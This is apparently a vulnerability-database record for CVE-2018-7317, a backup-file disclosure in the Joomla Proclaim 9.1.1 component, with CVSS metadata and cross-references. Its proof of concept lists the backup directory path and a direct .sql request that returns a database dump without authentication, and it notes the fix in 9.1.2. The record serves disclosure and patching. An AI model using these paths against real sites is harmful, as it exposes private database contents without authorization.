ID PACKETSTORM:146546
Type packetstorm
Reporter Ihsan Sencan
Modified 2018-02-23T00:00:00
Description
`# # # #
# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: https://www.christianwebministries.org/
# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/
# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip
# Version: 9.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7317
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
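# 1) The component's backup directory sits under the public media path; the CVSS vectors in this record (Au:N / PR:N) indicate no authentication is needed to reach it:
# http://localhost/[PATH]/media/com_biblestudy/backup/
#
# A database backup stored there is returned on a direct request for the .sql file (the file name below is presumably from the author's test install):
# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql
#
# Resolution, per the Joomla VEL entry in this record (JVEL:569): update to 9.1.2. Also check that no old .sql backups remain under media/com_biblestudy/backup/.
#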
# # # #
`
{"id": "PACKETSTORM:146546", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla! Proclaim 9.1.1 Backup Disclosure", "description": "", "published": "2018-02-23T00:00:00", "modified": "2018-02-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/146546/Joomla-Proclaim-9.1.1-Backup-Disclosure.html", "reporter": "Ihsan Sencan", "references": [], "cvelist": ["CVE-2018-7317"], "lastseen": "2018-02-24T00:58:03", "viewCount": 13, "enchantments": {"score": {"value": 4.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2019-1094"]}, {"type": "cve", "idList": ["CVE-2018-7317"]}, {"type": "exploitdb", "idList": ["EDB-ID:44159"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B115ED933DE761EFA1CA7EE42C3A61CB"]}, {"type": "joomla", "idList": ["JVEL:569"]}, {"type": "zdt", "idList": ["1337DAY-ID-29865"]}], "rev": 4}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2019-1094"]}, {"type": "cve", "idList": ["CVE-2018-7317"]}, {"type": "exploitdb", "idList": ["EDB-ID:44159"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B115ED933DE761EFA1CA7EE42C3A61CB"]}, {"type": "joomla", "idList": ["JVEL:569"]}, {"type": "zdt", "idList": ["1337DAY-ID-29865"]}]}, "exploitation": null, "vulnersScore": 4.6}, "sourceHref": "https://packetstormsecurity.com/files/download/146546/joomlaproclaim911-disclsoe.txt", "sourceData": "`# # # # \n# Exploit Title: Joomla! 
Component Proclaim 9.1.1 - Backup Download \n# Dork: N/A \n# Date: 22.02.2018 \n# Vendor Homepage: https://www.christianwebministries.org/ \n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/ \n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip \n# Version: 9.1.1 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-7317 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/media/com_biblestudy/backup/ \n# \n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql \n# \n# # # # \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645362037}}
{"zdt": [{"lastseen": "2018-04-13T09:46:29", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-02-22T00:00:00", "type": "zdt", "title": "Joomla Proclaim 9.1.1 Component - Backup File Download Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7317"], "modified": "2018-02-22T00:00:00", "id": "1337DAY-ID-29865", "href": "https://0day.today/exploit/description/29865", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\r\n# Vendor Homepage: https://www.christianwebministries.org/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\r\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\r\n# Version: 9.1.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7317\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/media/com_biblestudy/backup/\r\n# \r\n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\r\n# \r\n# # # #\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/29865", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:19:53", "description": "An information disclosure vulnerability exists in Joomla Component Proclaim. 
Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-08-27T00:00:00", "type": "checkpoint_advisories", "title": "Joomla Component Proclaim Backup File Download (CVE-2018-7317)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7317"], "modified": "2019-08-27T00:00:00", "id": "CPAI-2019-1094", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:23", "description": "\nJoomla! Component Proclaim 9.1.1 - Backup File Download", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-22T00:00:00", "title": "Joomla! 
Component Proclaim 9.1.1 - Backup File Download", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7317"], "modified": "2018-02-22T00:00:00", "id": "EXPLOITPACK:B115ED933DE761EFA1CA7EE42C3A61CB", "href": "", "sourceData": "# # # #\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\n# Dork: N/A\n# Date: 22.02.2018\n# Vendor Homepage: https://www.christianwebministries.org/\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\n# Version: 9.1.1\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-7317\n# # # #\n# Exploit Author: Ihsan Sencan\n# # # #\n# \n# POC: \n# \n# 1)\n# http://localhost/[PATH]/media/com_biblestudy/backup/\n# \n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\n# \n# # # #", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T18:36:27", "description": "Backup Download exists in the Proclaim 9.1.1 component for Joomla! 
via a direct request for a .sql file under backup/.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-22T19:29:00", "type": "cve", "title": "CVE-2018-7317", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7317"], "modified": "2018-03-13T15:12:00", "cpe": ["cpe:/a:christianwebministries:proclaim:9.1.1"], "id": "CVE-2018-7317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7317", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:christianwebministries:proclaim:9.1.1:*:*:*:*:joomla\\!:*:*"]}], "exploitdb": [{"lastseen": "2022-05-04T17:35:28", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-22T00:00:00", "type": "exploitdb", "title": "Joomla! 
Component Proclaim 9.1.1 - Backup File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2018-7317", "CVE-2018-7317"], "modified": "2018-02-22T00:00:00", "id": "EDB-ID:44159", "href": "https://www.exploit-db.com/exploits/44159", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\r\n# Dork: N/A\r\n# Date: 22.02.2018\r\n# Vendor Homepage: https://www.christianwebministries.org/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\r\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\r\n# Version: 9.1.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7317\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/media/com_biblestudy/backup/\r\n# \r\n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\r\n# \r\n# # # #", "sourceHref": "https://www.exploit-db.com/download/44159", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "joomla": [{"lastseen": "2021-07-28T14:33:52", "description": "Proclaim from Christian Web Ministries (installs as com_biblestudy), versions 9.1.1 and previous, arbitrary file upload, also backup file download\n\nresolution: update to 9.1.2 fixes both issues\n\nupdate notice: <https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases>\n", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-27T00:00:00", "type": "joomla", "title": "Proclaim, 9.1.1, Arbitrary File Upload", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7316", "CVE-2018-7317"], "modified": "2018-02-27T12:42:35", "id": "JVEL:569", "href": "https://vel.joomla.org", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}